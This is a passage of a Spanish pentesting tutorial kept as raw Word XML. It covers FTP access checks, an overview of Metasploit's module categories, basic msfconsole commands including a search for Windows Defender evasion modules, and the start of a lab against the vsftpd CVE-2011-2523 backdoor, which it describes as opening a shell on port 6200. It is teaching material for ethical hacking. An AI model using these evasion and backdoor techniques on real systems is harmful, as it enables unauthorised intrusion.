    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"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Intento de acceso con el usuario root. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:fill="f7f7f8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Transferencia de archivos con los comandos put/mput (subir) y get/mget. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:fill="f7f7f8" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprobación de a qué parte del sistema de ficheros tiene acceso cada usuario. ¿Y si los usuarios locales no han sido “encarcelados”?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:hanging="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nx1vvghpi999" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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Estamos ante un framework muy popular que se encuentra en todas las distribuciones GNU/Linux pensadas para el pentesting. Se trata de un conjunto de herramientas gracias a las cuales el hacker ético podrá desarrollar y ejecutar exploits que, lanzados contra uno o varios objetivos, intenten aprovecharse de alguna vulnerabilidad en él o ellos. También dispone de un archivo de shellcodes que puede ser muy útil para buscar vulnerabilidades en la fase de enumeración. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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En </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, los módulos son trozos de código que llevan a cabo una o varias tareas, tales como: ejecutar un exploit, escanear máquinas remotas… Están clasificados en diferentes categorías; algunas de las más importantes son </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="120" w:line="276"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Auxiliary</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: los módulos de esta categoría son un popurrí de diferentes tareas: escaneo, enumeración, búsqueda de vulnerabilidades… Por lo tanto, son módulos  ligados más bien a la fase de enumeración. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Exploits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: cada módulo de esta categoría es un exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Payloads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:  se trata de módulos cuyo código está muy relacionado con módulos de la categoría </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Son su carga útil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Post: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">módulos para la post-explotación. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="12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Evasion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: sirven para intentar evadir los antivirus. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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792" w:right="0" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.mdqsehyuh7w7" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primeros pasos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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Si no tenemos instalado el framework, podemos hacerlo con la siguiente instrucción:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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sudo apt install metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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continuación, debemos iniciar </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, si no lo estuviera. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:fill="f1f1f1" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /etc/init.d/postgresql start</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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trabajar con la herramienta, ejecutaremos el siguiente comando: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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041103" cy="3308070"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14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041103" cy="330807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after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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E">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queremos consultar los módulos que existen en una categoría, podemos utilizar el comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para consultar los módulos de la categoría evasion, ejecutaremos lo sigiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show evasion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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1295400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14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39973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 el comando search se pueden buscar módulos según el nombre de la aplicación o del servicio. Si queremos hacer una búsqueda sólo en los módulos de una categoría, deberemos indicar ésta mediante la palabra </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Por ejemplo, para buscar los módulos relacionados con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows_defender </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">en la categoría Evasion, escribiríamos este comando: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:evasion windows_defender </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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1231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13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997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 necesitamos más información de un módulo, podemos utilizar el comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. siguiendo con el ejemplo anterior, supongamos que queremos obtener información acerca del primero de los dos módulos; ejecutariamos uno de estos comandos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info evasion/windows/windows_defender_exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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info 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5399730" cy="3708400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14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39973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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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ver todavía más información acerca del módulo, podemos utilizar el mismo comando con el parámetro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</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A">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info -d 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3644998" cy="2282142"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14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644998" cy="228214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after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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D">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 interesante saber que los módulos podrían consultarse asimismo accediendo al directorio correspondiente dentro del directorio </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploit-framework</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E">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continuación vemos los módulos de la categoría </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evasion</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F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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962525" cy="2581275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13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625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after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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Ahora, algunos de los subdirectorios (dentro de ellos están los módulos) de la categoría </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits</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52">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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400909" cy="5070195"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13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400909" cy="507019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after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>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4">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240" w:lineRule="auto"/>
        <w:ind w:left="792" w:right="0" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7scj7dannu5p" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotando vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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Desde una máquina Kali, vamos a intentar explotar una vulnerabilidad en de otra máquina. Se trata de la vulnerabilidad registrada con el código </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2011-2523</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que está asociada al software </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. La vulnerabilidad consiste en que al loguearse con un usaurio acabado en “:)” y cualquier contraseña se abre una shell en la víctima en el puerto 6200. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1224" w:hanging="504.00000000000006"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.cy275b3e4zhu" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En Metasploit</w:t>
      </w:r>
    </w:p>
